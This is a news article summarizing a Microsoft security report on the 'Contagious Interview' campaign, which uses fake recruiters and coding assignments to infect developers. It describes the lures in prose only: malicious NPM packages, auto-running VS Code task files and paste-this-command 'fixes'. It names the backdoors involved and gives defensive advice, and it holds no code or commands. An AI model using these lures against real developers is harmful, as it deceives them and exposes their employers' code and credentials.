The Fake Job Trap: Microsoft Exposes the ‘Contagious Interview’ Campaign Targeting Developers

A recent report from Microsoft Defender Experts sheds light on the “Contagious Interview” campaign, a sophisticated social engineering operation that has been quietly targeting software developers since at least December 2022.

This campaign represents a calculated shift in how attackers gain entry to corporate networks. By “abusing the trust inherent in modern recruitment workflows,” threat actors are successfully bypassing traditional defenses by hiding in plain sight.

Victims aren’t just sent a malicious link; they are brought into a “convincingly staged recruitment process” that mirrors the real world, complete with recruiter outreach and technical discussions.

The trap is typically sprung during the “assignment” phase. Attackers, posing as recruiters from cryptocurrency or AI firms, instruct developers to perform routine tasks that lead to infection:

• Malicious Packages: Victims are asked to clone and execute NPM packages from platforms like GitHub or Bitbucket.
• IDE Exploitation: In newer versions of the attack, hackers leverage Visual Studio Code workflows. Once a victim “trusts” a downloaded repository, the IDE automatically executes a task configuration file that fetches a backdoor.
• Fabricated Errors: Some campaigns direct users to a fake screening website that throws a “technical error”. The victim is then told to copy and paste a command to “fix” the issue—a command that actually installs malware.

Once the developer lowers their guard, a suite of modular backdoors takes over. The report highlights several key players:

• OtterCookie: A “stealthy backdoor” used for detailed system reconnaissance and stealing credentials.
• Invisible Ferret: A Python-based tool used for “remote command execution, extended system reconnaissance, and persistent control”.
• FlexibleFerret: A modular backdoor (available in Go and Python) that establishes persistence by modifying registry keys.

Interestingly, the code quality of these tools is often unrefined. Microsoft observed “inconsistent error handling” and “tutorial-style comments,” suggesting a development process that “prioritizes speed and functional output over refined engineering”—potentially aided by AI-assisted coding tools.

This isn’t just about stealing a single laptop. By compromising a developer’s endpoint, threat actors gain a foothold into the “crown jewels” of an enterprise: source code, CI/CD pipelines, and production infrastructure. From there, they harvest everything from cloud credentials and API tokens to cryptocurrency wallets.

To counter this, Microsoft Defender Experts advises that “organizations should treat recruitment workflows as attack surfaces”. Recommendations include using isolated environments for coding tests and closely monitoring developer build tools for suspicious dependency execution.